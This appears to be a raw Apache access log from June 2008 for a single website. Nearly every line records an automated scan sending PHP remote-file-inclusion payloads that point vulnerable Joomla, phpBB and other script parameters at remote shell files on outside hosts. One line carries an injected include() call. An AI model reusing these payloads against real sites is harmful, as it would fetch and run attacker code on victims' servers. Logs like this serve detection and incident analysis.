207.58.140.62 - - [17/Jun/2008:13:03:51 -0700] "GET /index2.php?url_page=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.62 - - [17/Jun/2008:13:03:51 -0700] "GET /logs/index2.php?url_page=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [17/Jun/2008:13:03:58 -0700] "GET /VirtueMart/com_virtuemart_1.1.0.j15/export.php?my_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:13:03:59 -0700] "GET /logs/index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:13:03:59 -0700] "GET /logs/index1.php?dat=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:13:04:00 -0700] "GET /index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:13:04:00 -0700] "GET /index1.php?dat=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:04:37 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:04:37 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:04:37 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:04:40 -0700] "GET /logs/services.php?page=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:04:42 -0700] "GET /htmltonuke.php?filnavn=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:13:04:45 -0700] "GET /services.php?page=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.140.62 - - [17/Jun/2008:13:04:57 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.62 - - [17/Jun/2008:13:04:57 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:13:05:42 -0700] "GET /logs/index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:13:05:42 -0700] "GET /index1.php?dat=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:13:06:04 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:13:06:04 -0700] "GET /htmltonuke.php?filnavn=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:13:06:13 -0700] "GET /logs/main.php?pagina=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:06:13 -0700] "GET /logs/access_080221.log/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:13:06:13 -0700] "GET /main.php?pagina=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:06:13 -0700] "GET /]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:06:14 -0700] "GET /logs/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.158.0.5 - - [17/Jun/2008:13:06:16 -0700] "GET /logs/db.php?path_local=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [17/Jun/2008:13:06:21 -0700] "GET /db.php?path_local=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:06:29 -0700] "GET /logs/access_080221.log/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:06:29 -0700] "GET /]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:06:30 -0700] "GET /logs/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:13:06:40 -0700] "GET /logs/services.php?page=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:13:06:41 -0700] "GET /services.php?page=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:13:06:42 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:13:06:47 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:13:07:15 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [17/Jun/2008:13:07:19 -0700] "GET /logs/access_080225.log/db.php?path_local=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [17/Jun/2008:13:07:19 -0700] "GET /db.php?path_local=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [17/Jun/2008:13:07:20 -0700] "GET /logs/db.php?path_local=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.63.85.187 - - [17/Jun/2008:13:07:29 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:13:07:32 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
74.55.76.110 - - [17/Jun/2008:13:07:33 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
74.55.76.110 - - [17/Jun/2008:13:07:33 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
80.74.144.24 - - [17/Jun/2008:13:07:51 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:13:07:51 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:13:07:53 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:13:08:20 -0700] "GET /include/functions_common.php?gl_root_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:08:57 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:08:57 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:08:58 -0700] "GET /logs/access_080211.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:08:58 -0700] "GET /logs/access_080211.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:08:58 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:08:58 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:08:58 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:08:59 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:09:04 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:09:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:09:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:09:14 -0700] "GET /logs/access.log/rgboard/include/bbs.lib.inc.php?site_path=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:09:14 -0700] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:09:14 -0700] "GET /logs/rgboard/include/bbs.lib.inc.php?site_path=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:13:09:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:13:09:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.142.87.98 - - [17/Jun/2008:13:09:24 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:09:43 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:09:59 -0700] "GET /logs/access_071212.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:10:03 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:10:04 -0700] "GET /logs/access_071213.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:10:04 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:10:04 -0700] "GET /logs/access_071213.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:10:08 -0700] "GET /logs/access_071212.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:10:09 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.18.204.110 - - [17/Jun/2008:13:10:10 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:13:10:23 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:13:10:30 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:13:11:01 -0700] "GET /logs/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [17/Jun/2008:13:11:01 -0700] "GET /]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:13:11:12 -0700] "GET /logs/index.php?url=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.158.0.5 - - [17/Jun/2008:13:11:13 -0700] "GET /logs/access_071211.log/db.php?path_local=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.161.12.202 - - [17/Jun/2008:13:11:14 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.piterx.xpg.com.br/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.161.12.202 - - [17/Jun/2008:13:11:15 -0700] "GET /logs//login.php?dir=http://www.piterx.xpg.com.br/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:13:11:19 -0700] "GET /index.php?url=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.812" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:11:27 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:11:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:11:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:11:42 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:11:42 -0700] "GET /errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:11:42 -0700] "GET /logs/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:11:53 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:13:11:55 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:13:11:56 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:13:11:56 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:13:11:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.51.226 - - [17/Jun/2008:13:12:10 -0700] "GET /blog/ HTTP/1.0" 200 18252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:12:36 -0700] "GET /show.php?page=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:12:37 -0700] "GET /logs/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:12:37 -0700] "GET /errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.155.9.236 - - [17/Jun/2008:13:12:40 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.161.12.202 - - [17/Jun/2008:13:12:41 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.piterx.xpg.com.br/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:13:12:44 -0700] "GET /logs/services.php?page=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:13:12:45 -0700] "GET /services.php?page=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:13:12:45 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:13:12:46 -0700] "GET /htmltonuke.php?filnavn=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:13:07 -0700] "GET /logs/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:13:13:07 -0700] "GET /]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:13:09 -0700] "GET /logs/access_080211.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:13:09 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:13:10 -0700] "GET /logs/access_080211.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:13:10 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:13:10 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:13:10 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:14:00 -0700] "GET /logs/access_071213.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:14:00 -0700] "GET /logs/access_071213.log//skin/zero_vote/setup.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:14:17 -0700] "GET /logs/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [17/Jun/2008:13:14:18 -0700] "GET /]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.40.125.3 - - [17/Jun/2008:13:14:35 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.40.125.3 - - [17/Jun/2008:13:14:40 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:15:53 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:15:55 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:15:55 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:15:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:15:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:15:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:15:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:15:58 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
